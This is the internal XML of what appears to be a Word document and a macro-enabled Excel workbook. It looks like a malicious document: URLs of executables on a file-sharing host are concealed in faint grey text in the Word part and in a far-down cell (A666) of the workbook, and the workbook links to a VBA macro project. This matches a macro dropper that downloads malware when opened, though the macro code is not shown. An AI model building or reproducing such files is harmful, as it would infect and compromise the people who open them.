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03" w:rsidRPr="00357D88" w:rsidRDefault="00F96B0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0169F7" w:rsidRDefault="000169F7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:color w:val="D9D9D9" w:themeColor="background1" w:themeShade="D9"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>http://a.pomf.cat/stgrcg.exe\</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="00D85293" w:rsidRPr="00016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169F7"/>
    <w:rsid w:val="00055732"/>
    <w:rsid w:val="000569C1"/>
    <w:rsid w:val="000B1EAF"/>
    <w:rsid w:val="00102CE9"/>
    <w:rsid w:val="001064CE"/>
    <w:rsid w:val="001758CA"/>
    <w:rsid w:val="001859D7"/>
    <w:rsid w:val="00213094"/>
    <w:rsid w:val="002A689B"/>
    <w:rsid w:val="002E3970"/>
    <w:rsid w:val="00322C80"/>
    <w:rsid w:val="00355CEF"/>
    <w:rsid w:val="00357D88"/>
    <w:rsid w:val="003C14A3"/>
    <w:rsid w:val="003D4175"/>
    <w:rsid w:val="003D4E4C"/>
    <w:rsid w:val="003E0812"/>
    <w:rsid w:val="00400433"/>
    <w:rsid w:val="00401AA9"/>
    <w:rsid w:val="004125C7"/>
    <w:rsid w:val="00423581"/>
    <w:rsid w:val="004C1586"/>
    <w:rsid w:val="004C5421"/>
    <w:rsid w:val="005411F3"/>
    <w:rsid w:val="005A4499"/>
    <w:rsid w:val="00610ECB"/>
    <w:rsid w:val="006117C5"/>
    <w:rsid w:val="00617DDC"/>
    <w:rsid w:val="006D6EB6"/>
    <w:rsid w:val="006E0CC5"/>
    <w:rsid w:val="006E56FA"/>
    <w:rsid w:val="007C2BCD"/>
    <w:rsid w:val="00864FBB"/>
    <w:rsid w:val="008742AD"/>
    <w:rsid w:val="00874B96"/>
    <w:rsid w:val="00877FF0"/>
    <w:rsid w:val="00895367"/>
    <w:rsid w:val="009210E2"/>
    <w:rsid w:val="00973140"/>
    <w:rsid w:val="00981292"/>
    <w:rsid w:val="00A01528"/>
    <w:rsid w:val="00A66539"/>
    <w:rsid w:val="00AB08DE"/>
    <w:rsid w:val="00AF3821"/>
    <w:rsid w:val="00BB3BFC"/>
    <w:rsid w:val="00BC6BA3"/>
    <w:rsid w:val="00C055C8"/>
    <w:rsid w:val="00C545B6"/>
    <w:rsid w:val="00CA154B"/>
    <w:rsid w:val="00CB1B6E"/>
    <w:rsid w:val="00CC2C0D"/>
    <w:rsid w:val="00D23FBB"/>
    <w:rsid w:val="00D45AF6"/>
    <w:rsid w:val="00D85293"/>
    <w:rsid w:val="00E5454C"/>
    <w:rsid w:val="00E6267D"/>
    <w:rsid w:val="00E64850"/>
    <w:rsid w:val="00ED25FE"/>
    <w:rsid w:val="00F571DA"/>
    <w:rsid w:val="00F84440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Anna;AnnaS;Fortek</dc:creator>
  <cp:lastModifiedBy>Anna</cp:lastModifiedBy>
  <cp:revision>109</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-01T17:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-12-03T20:00:00Z</dcterms:modified>
</cp:coreProperties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7" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin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sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1">
  <si>
    <t>http://a.pomf.cat/cwdlil.exe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" x14ac:knownFonts="1">
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Calibri"/>
      <family val="2"/>
      <charset val="238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</extLst>
</styleSheet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book.xml><?xml version="1.0" encoding="utf-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <fileVersion appName="xl" lastEdited="5" lowestEdited="5" rupBuild="9302" codeName="{8C4F1C90-05EB-6A55-5F09-09C24B55AC0B}"/>
  <workbookPr codeName="ThisWorkbook" defaultThemeVersion="124226"/>
  <bookViews>
    <workbookView xWindow="240" yWindow="60" windowWidth="20115" windowHeight="8010"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
    <sheet name="Sheet3" sheetId="3" r:id="rId3"/>
  </sheets>
  <functionGroups builtInGroupCount="17"/>
  <calcPr calcId="144525"/>
</workbook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1"/>
  <dimension ref="A666"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="15" x14ac:dyDescent="0.25"/>
  <sheetData>
    <row r="666" spans="1:1" x14ac:dyDescent="0.25">
      <c r="A666" t="s">
        <v>0</v>
      </c>
    </row>
  </sheetData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2"/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3"/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